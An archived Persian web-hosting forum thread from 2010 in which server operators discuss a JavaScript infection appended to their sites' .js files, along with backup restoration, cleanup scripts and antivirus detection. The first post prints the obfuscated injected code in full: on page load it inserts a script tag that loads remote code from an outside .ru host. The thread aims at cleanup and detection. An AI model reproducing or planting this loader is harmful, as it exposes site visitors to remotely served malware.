PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : ويروس جديد js ولي اين بار جدي تر!



Dadeha.com
January 6th, 2010, 15:17
سلام دوستان
چندي پيش اكثر سرويس دهنگان دچار ويروسي شدند كه بعد ها معروف شد به ويروس js كه گوگل سايت رو مخرب ميشناخت و . . . ولي خوب راه حل داشت كه يكسري فايل php و يكسري كد مشخص در برخي فايل ها بود كه ميشد رفعش كرد و راه نفوذش هم از طريف ftp بود.

اينبار ويروس جديدي اومده كه اكثر سرويس دهنگان رو دچار خودش كرده.
دقيق نميدونم اسمش چيه و چي هست ولي در آخر تمام فايل هاي js‌خودش رو كپي ميكنه كه ابتداش هم اين كد هستش
/*GNU GPL*/
پس اون رو با نام GNU GPL ميشناسيم. :-o
الان تمام سايت هاي سرور مادچار اين ويروس شده و بقيش هم داره آلوده ميشه. :66:
اين نمونه كدش هست:

/*GNU GPL*/ try{window.onload = function(){var Cso9f3zbpopes = document.createElement('s^(c!#r##i&)p(#@t#$'.replace(/@|\)|\!|\$|#|&|\^|\(/ig, ''));var Nzol2dvsd2 = 'Ojzdtti6seof7l';Cso9f3zbpopes.setAttribute('type' , 't@@!e(&(x!)t^&$&!/)@&&j#^^a#v(!a)^s)c^r&$i)$p)$#t&'.replace(/#|\)|\(|&|\$|\!|\^|@/ig, ''));Cso9f3zbpopes.setAttribute('src', 'h(&!t^#^t!p((^:(!/##^^/#b^$i@(@z$)^r@#^a^!!t&)e@$-#^!c#$#o#^m$)&@.^i#(!@m^p^r!!e)#s@@(s)^!.@&c^#$o)$^.&$(((j@#p)(^@.$@t^$h$e^($p$&(i)&&r#a#t$e$^^)b@!a)y)$-#!&o($^r(&g)#@^.^&s@$i@@t@)!e&)s!#a&&g(@@)e#^s&^(.&&#r^)()u$$:#)(8&0)@8!!0$$)/$$@g)#o(()o@&g&(l^&e@!.^(c#&o!((@@m#$)!/(^g&@o@o#&#^g!&&l$#e&&^!).)^#^c&()o#@m#/^^@h&&##o$!)t^f#)&^i)!l!e^^).&!^!#c!#@^o^($m#()&/)@a)#!u#&t)!^o!$!#.!&@r)&$!u^^$/))t&)^o$$$p!(i#^@x!.)!#c()#@o$m#@/^#!'.replace(/\^|\(|\)|&|\!|#|@|\$/ig, ''));Cso9f3zbpopes.setAttribute('defer', 'd#$(e^^$f!&@e$r&#&'.replace(/#|@|\$|\!|&|\)|\(|\^/ig, ''));Cso9f3zbpopes.setAttribute('id', 'U!(2))#@2@3!!(0@u(g)4!&#v&$2&)^^x)&('.replace(/@|\$|&|\!|#|\)|\^|\(/ig, ''));document.body.appendChild(Cso9f3zbpopes);}} catch(Vm2be34ea8nhd) {}

دوستان لطفا يه همفكري بكنيم تا بتونيم مانند سري قبل سريعا مشكل رو حل كنيم.

باتشكر :77:

iranihost
January 6th, 2010, 15:36
وا ا ا ا ا ا ی ی ی

اینجا هم ویروس گرفته !!

آنتی ویروس نمیزاره سایت باز بشه !

packsaft
January 6th, 2010, 15:39
این که بیشتر از چند ماه هست جدید نیست که !!
یه جایی خوندم متاسفانه به گفته اونها راهی به جز بک آپ نیست و باید همه فایل ها پاک بشن
البته چیزی هست که همونجا خوندم شاید تا الان راه حل درستی پیدا کرده باشن براش

delta
January 6th, 2010, 15:46
آره.متاسفانه باید تمام فایلها پاک بشه چون هر فایلی رو پاک کنی بازم کپی میزنه.باید فایلها پاک بشه و بک آپ! خوشبختانه خوبیش اینه که دیتابیس رو آلوده نمیکنه و فقط فایلها رو آلوده میکنه..

packsaft
January 6th, 2010, 15:53
البته شاید بشه روش کار کرد یه اسکریپتی نوشت که خودش دنبال یه کد خاصی بگرده و فقط اون کد رو پاک کنه (همون متدی که آنتی ویروس ها ازش برای ترمیم فایلها استفاده میکنن)
شما بک آپ نداری ؟

sadegh
January 6th, 2010, 16:03
دروغ می گی؟
من قلبم ضعیفه
یکبار گرقتم زندگیم نابود شد :59:

:63::63::63::63::-ss:-ss:-ss:-ss:-ss

bijans
January 6th, 2010, 16:14
این ویروس یکی از مشتری های ما رو پروند. جالبه فایل هاشونو بردن روی یه سرور دیگه و ظاهراً اونجا مشکلی نداره. می گفتن هاستتون ویروسیه!!!!!!!!!!

Woshka
January 6th, 2010, 16:14
کل فایل هاتو بده تا برات پاک سازی کنم تحویلت بدم ;)
wordpress یکی اینجوری شده بود پاک سازی کردم دادم تحویلش

IFACO.Net
January 6th, 2010, 16:55
کدام آنتی ویروس های اینو میشناسند ؟ کاسپراسکی ؟ آواست ؟

یه نمونه سایت آلوده به این ویروس رو لینک بدید لطفا؟

packsaft
January 6th, 2010, 17:22
سایت خودتون هم آلوده شده؟ثبت دامنه | ميزبانی وب | نمايندگی | سرور مجازی | سرور اختصاصی (http://irancms.ir)

Dadeha.com
January 6th, 2010, 20:07
وا ا ا ا ا ا ی ی ی

اینجا هم ویروس گرفته !!

آنتی ویروس نمیزاره سایت باز بشه !
نه اينجا ويروسي نشده ، براي كدي هست كه من قرار دادم. ويروسي در اين سايت در كار نيست. :115:


این که بیشتر از چند ماه هست جدید نیست که !!
یه جایی خوندم متاسفانه به گفته اونها راهی به جز بک آپ نیست و باید همه فایل ها پاک بشن
البته چیزی هست که همونجا خوندم شاید تا الان راه حل درستی پیدا کرده باشن براش
نه. اين اون قبليه نيست. اول صحبتم گفتم كه اون يه چيز ديگه بود و راه نفوذش هم مشكلي بود از FTP ولي اين بدون اينكه تغييري در كانفيگ سرور داده بشه اينجور شد.!


آره.متاسفانه باید تمام فایلها پاک بشه چون هر فایلی رو پاک کنی بازم کپی میزنه.باید فایلها پاک بشه و بک آپ! خوشبختانه خوبیش اینه که دیتابیس رو آلوده نمیکنه و فقط فایلها رو آلوده میکنه..
من تو يكي از سايت ها ديدم كه براش يه اسكريپت نوشتن كه پاكش ميكنه ولي آنتي ويروس من (Nod32) به اون هم گير داد و حتي بعد از ران كردنش در يكي از سايت ها ارور 500 داد فكر كنم. احتمالا فانكشني كه احتياج داره بستس.


البته شاید بشه روش کار کرد یه اسکریپتی نوشت که خودش دنبال یه کد خاصی بگرده و فقط اون کد رو پاک کنه (همون متدی که آنتی ویروس ها ازش برای ترمیم فایلها استفاده میکنن)
شما بک آپ نداری ؟
بله نوشته شده ولي در بالا گفتم كه مشكلش چيه


سایت خودتون هم آلوده شده؟ثبت دامنه | ميزبانی وب | نمايندگی | سرور مجازی | سرور اختصاصی (http://irancms.ir)
نه ، من كه ويروسي نميبينم. هنوز سايت اصلي ويروسي نشده ولي احتمالا تا آخر شب ويروس محترم ترتيب سايت اصلي رو هم خواهد داد :-ss

---------- Post added at 08:07 PM ---------- Previous post was at 07:24 PM ----------

دوستان نكته جالب اينجاست كه وقتي رفتم تو سرور بك آپ با يه چيز جالب روبرو شدم.
پشتيبان به صورت روزانس و پشتيباني كه امروز از سايت ها گرفته شده به صورت عجيبي حجمش 1 گيگ از شب هاي قبل كمتر هستش! معلوم نيست ويروسه چي ها رو چي كار كرده
:39:

packsaft
January 6th, 2010, 20:33
یکی از سایتهای آلوده رو لطف میکنین آدرسش منظورمه

---------- Post added at 09:33 PM ---------- Previous post was at 09:27 PM ----------

من منظورم این بود که خودت یه اسکریپت بنویسی براش فقط باید سطح دسترسی خوبی داشته باشه
بعدشم تو این مواقع این اسکریپتهای آماده اصلا قابل اعتماد نیستن لااقل به نظر من (معلوم نیست چه بلایی سر سرور و دیتا بیاد)
شما خودتون یه اسکریپتی بنویسین مشکل حل شه خسارت نبینین

Dadeha.com
January 6th, 2010, 21:04
الان من كل سايت ها رو بك آپ روز قبل فايل ها (نه ديتابيس!) رو برگردوندم و الان هيچ گزارشي در مورد آلوده بودن از يوزرها دريافت نشده.
در كل كدي كه در صفحه قبل قرار دادم رو ميندازه انتهاي فايل هاي js

packsaft
January 6th, 2010, 22:22
اون فایل جاوا رو اگه میشه آپلود کنین خود فایل رو میخوام با پسوند rar اگه باشه خیلی خوبه

sodahost
January 7th, 2010, 01:48
اسم ویروس JS:Illredir هست !
و آوست هم شناسایی میکنه !!

Dadeha.com
January 7th, 2010, 12:51
تو سايت هاي ديگه خوندم كه اولين آنتي ويروسي كه شناساييش كرد nod32 بود و اون هم به خاطر هوش مصنوعي فوق العاده اين آنتي ويروس هستش

sshiran
January 7th, 2010, 20:56
کاسپر و نود میشناسن آوست هم که دوستمون گفته میشناسه .